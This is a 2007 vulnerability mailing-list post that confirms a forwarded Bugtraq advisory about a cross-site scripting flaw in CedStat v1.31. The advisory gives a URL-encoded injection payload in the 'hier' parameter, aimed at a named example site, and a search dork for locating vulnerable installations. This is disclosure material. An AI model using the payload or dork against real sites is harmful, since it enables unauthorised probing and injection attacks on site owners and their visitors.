[VIM] [TRUE] CedStat v1.31 XSS
Noam Rathaus
noamr at beyondsecurity.com
Tue Feb 20 06:07:06 EST 2007
Hi,
The vulnerability is true - found it in the Internet, the product appears to
be "non-existing" or at least no longer available.
BTW: Accessing http://intranet.ac-nancy-metz.fr/cedstat/ returns:
Perdu sur l'Internet ?
Pas de panique, on va vous aider
* <----- vous êtes ici
Anyone read french?
---------- Forwarded Message ----------
Subject: CedStat v1.31 XSS
Date: Friday 16 February 2007 00:30
From: sn0oPy.team at gmail.com
To: bugtraq at securityfocus.com
* CedStat v1.31 XSS
* By : sn0oPy
* Risk : low
* site : http://cedtat.free.fr
* exploit :
http://www.target.ma/cedstat/index.php?hier=%3C%68%31%3E%74%65%73%74%65%64%20
%62%79%20%73%6E%30%6F%50%79%3C%2F%68%31%3E
Dork :
inurl:"/cedstat/"
* contact : sn0oPy at avenir-geopolitique.net
* greetz : [subzero], http://forums.avenir-geopolitique.net.
reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2672
-------------------------------------------------------
--
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com
More information about the VIM
mailing list